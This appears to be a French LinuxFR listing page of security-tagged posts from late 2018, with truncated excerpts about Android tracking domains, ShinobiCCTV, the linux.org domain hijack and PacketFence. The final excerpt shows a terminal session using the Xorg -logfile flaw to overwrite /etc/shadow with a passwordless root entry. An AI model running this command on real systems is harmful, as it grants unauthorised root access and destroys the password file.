Lien connect-or-cut : mini pare-feu sans privilège filtrant les connexions sortantes sous Unix et Windows
13
jan.
2019
Wiki Listes de noms de domaines utilisés sur Android
13
jan.
2019
Cet article tente à lister les noms de domaines utilisés sur les appareils android afin de pouvoir identifier les services.
auditrecording-pa.googleapis.com
Service utilisé par Google Play Service (src).
Il est conseillé de bloquer ce domaine.
geomobileservices-pa.googleapis.com
Service de géolocalisation de google. Même si vous configurez votre appareil afin de n'utiliser que le GPS/Galiléo, il va quand même émettre des requêtes régulières vers ce service.
Le bloquer est donc éssentiel par sécurité et n'empêchera pas les apps de (…)
🎦 Présentation de ShinobiCCTV Community Edition 👁️
31
déc.
2018
ShinobiCCTV Community Edition est un serveur de vidéo‐surveillance multi‐plate‐forme, dont les finitions se situent quelque part entre ZoneMinder et Kerberos.io.
Voyons ensemble ses particularités, ses avantages et inconvénients.
Lien Plus de 19000 livebox font fuiter leurs identifiants et mots de passe
23
déc.
2018
Wiki [Ubuntu/Debian] Installation complète de Shinobi Community Edition
16
déc.
2018
Introduction
Dans ce tutoriel sera presque tout expliqué afin de transformer une machine fraîchement installée en serveur ShinobiCCTV Community Edition.
Pour une présentation du logiciel, voyez cet article : 🎦 Présentation de ShinobiCCTV Community Edition 👁️
Ndlr : ajouter anti-bruteforce (fail2ban?) et sécurisation.
Pages principales de la WEBUI de Shinobi :
- http://your_shinobi:8080 ⇒ Dashboard.
- http://your_shinobi:8080/admin ⇒ Ici les utilisateurs créés par l'Administrateur pourront créer des "sous-utilisateurs", permettant de partager l'accès a des caméras.
- http://your_shinobi:8080/super ⇒ Gestion de l'administrateur, des comptes (…)
Lien ForSSHe : Analyse de 21 familles de logiciels malveillants
13
déc.
2018
Journal Le domaine linux.org détourné
9
déc.
2018
Vendredi 7 décembre, vers 0430 UTC, les serveurs de noms faisant autorité pour linux.org (à ne pas confondre avec linuxfr.org) ont été modifiés. Les nouveaux serveurs indiquaient comme adresse IP pour linux.org un serveur Web pirate (208.91.197.27, le serveur Web habituel étant chez Cloudflare, en 104.27.166.219 et 104.27.167.219). Apparemment (je n'ai pas pu le voir), le contenu comprenait diverses insultes contre Linux ("G3T 0WNED L1NUX N3RDZ") et Linus Torvalds, certaines reliées aux nouvelles conditions de participation à Linux.
Le service (…)
Journal Sécurité, Liberté, Education, Formation :
5
déc.
2018
« L’exigence de Sécurité dont nul ne peut contester le bien fondé est, comme souvent, sujet aux dévoiements habituels. D’objectif elle devient prétexte. Prétexte à sévérité, autoritarisme. Prétexte à « renforcement ». On renforce la réglementation, les clôtures, les limitations, les chicanes, les dos d’âne, les restrictions, les contraintes, les interdits. Mais les interdits excessifs sont des incitations à négliger tous les interdits : ils sont dangereux. Les contraintes non justifiées provoquent des réactions de défense : on triche ou (…)
Journal Téléphone mobile : suis-je paranoïaque ?
1
déc.
2018
En dehors du boulot, j'ai tendance à ne pas être spécialement rigoureux en terme de sécurité, j'ai certains mots de passe qui me servent à plusieurs endroits, j'ai le même mot de passe root qui n'a pas changé depuis plus de 10 ans sur plusieurs machines, et il a même dû m'arriver parfois de répondre sincèrement à des « questions secrètes » censées protégées un compte1… et en plus de tout cela, je balance ces informations sur un (…)
Forum général.général Les tags populaires de LinuxFR dans le pied de page
14
nov.
2018
Dans le pied de page de LinuxFR, on trouve une section « Tags populaires ». Pourquoi pas, mais la liste des tags que je vois à l'heure où j'écris ces lignes est :
- banque
- crédit
- spam
- prêt
- offre
- prêter
- maemo
- sécurité
- l'argent
- immobilier
- python
- avancé
J'ai l'impression que ça n'est pas très représentatif du véritable contenu du site :p
Je ne sais pas si c'est représentatif des vrais tag (alors c'est un problème de modération) ou non (auquel cas c'est (…)
PacketFence version 8.2 est disponible
12
nov.
2018
Inverse annonce la sortie de la version 8.2 de PacketFence. PacketFence est une solution de conformité réseau (NAC) entièrement libre (GPL v2), supportée et reconnue. Procurant une liste impressionnante de fonctionnalités, telles un portail captif pour l’enregistrement ou la remédiation, une gestion centralisée des réseaux filaires et sans fil, le prise en charge du 802.1X, l’isolation niveau 2 des composantes identifiées comme problématiques, l’intégration aux détecteurs d’intrusions tels Snort et Suricata, la reconnaissance d’appareils avec Fingerbank et plus encore.
PacketFence peut être utilisé pour sécuriser efficacement aussi bien des réseaux de petite taille que de très grands réseaux hétérogènes.
Bien qu’étant une version « mineure », cette version 8.2 est une mise à jour importante, qui apporte de nombreux ajouts et de nombreuses améliorations, listés dans la suite de cette dépêche.
Forum général.petites-annonces DRI recrute 4 profils en télétravail
5
nov.
2018
Tout d'abord, longue vie à ce forum !
Grâce à lui, on a rencontré Alex qui a intégré les équipes DRI en télétravail comme adminsys, du bonheur !
Nous avions aussi posté en mai une annonce pour un dev et nous sommes finalement tombés (en dehors du forum sur un salon, le physique cela a du bon…) sur un super jeune en contrat d'apprentissage pour un bac +4.
Je poste donc nos nouvelles recherches pour intégrer l'équipe technique de DRI (…)
Forum Linux.débutant Meilleur distribution Linux pour confidentialité / anonymat
4
nov.
2018
Lien Mise en demeure de l'association 42
30
oct.
2018
Journal La faille grosse comme une maison
26
oct.
2018
[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)